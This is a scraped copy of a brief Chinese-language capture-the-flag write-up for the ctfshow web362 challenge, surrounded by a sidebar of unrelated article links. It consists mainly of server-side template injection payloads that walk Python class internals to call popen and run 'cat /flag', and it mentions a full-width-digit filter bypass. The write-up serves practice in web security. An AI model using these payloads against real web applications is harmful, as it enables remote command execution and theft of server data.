当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_62094846】
?name={
{"".__class__.__bases__[0].__subclasses__()}} 一直到這一步都是正常的
從12開始就沒用了
數字出現了問題,看wp用全角數字代替正常數字繞過
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
然後應該可以用正常方法做了
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_62094846]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231829007951.html
边栏推荐
- Rust: a simple example of TCP server and client
- QT excel operation summary
- WiFi ap6212 driver transplantation and debugging analysis technical notes
- 纠结
- Robocode tutorial 7 - Radar locking
- 登录和发布文章功能测试
- Keil RVMDK compiled data type
- kettle庖丁解牛第17篇之文本文件输出
- Vulnérabilité d'exécution de la commande de fond du panneau de commande JD - freefuck
- Implement a simple function to calculate the sum of all integers between M ~ n (m < n)
猜你喜欢
Deep learning classic network analysis and target detection (I): r-cnn
使用 bitnami/postgresql-repmgr 镜像快速设置 PostgreSQL HA
Docker installation MySQL
Excel intercept text
硬核解析Promise對象(這七個必會的常用API和七個關鍵問題你都了解嗎?)
Use of regular expressions in QT
Creation and use of QT dynamic link library
Cygwin64 right click to add menu, and open cygwin64 here
JD freefuck Jingdong HaoMao control panel background Command Execution Vulnerability
昇腾 AI 开发者创享日全国巡回首站在西安成功举行
随机推荐
Rust: how to implement a thread pool?
JD-FreeFuck 京東薅羊毛控制面板 後臺命令執行漏洞
Connection mode of QT signal and slot connect() and the return value of emit
STM32: LCD显示
Differences between SSD hard disk SATA interface and m.2 interface (detailed summary)
The difference between deep copy and shallow copy
【ACM】376. 摆动序列
If condition judgment in shell language
玻璃体中的硫酸软骨素
Daily CISSP certification common mistakes (April 15, 2022)
Custom prompt box MessageBox in QT
Use of regular expressions in QT
Refcell in rust
K210串口通信
Ionic 从创建到打包指令集顺序
Realization of consumer gray scale
Keil RVMDK compiled data type
Daily CISSP certification common mistakes (April 14, 2022)
After CANopen starts PDO timing transmission, the heartbeat frame time is wrong, PDO is delayed, and CANopen time axis is disordered
Implement a simple function to calculate the sum of all integers between M ~ n (m < n)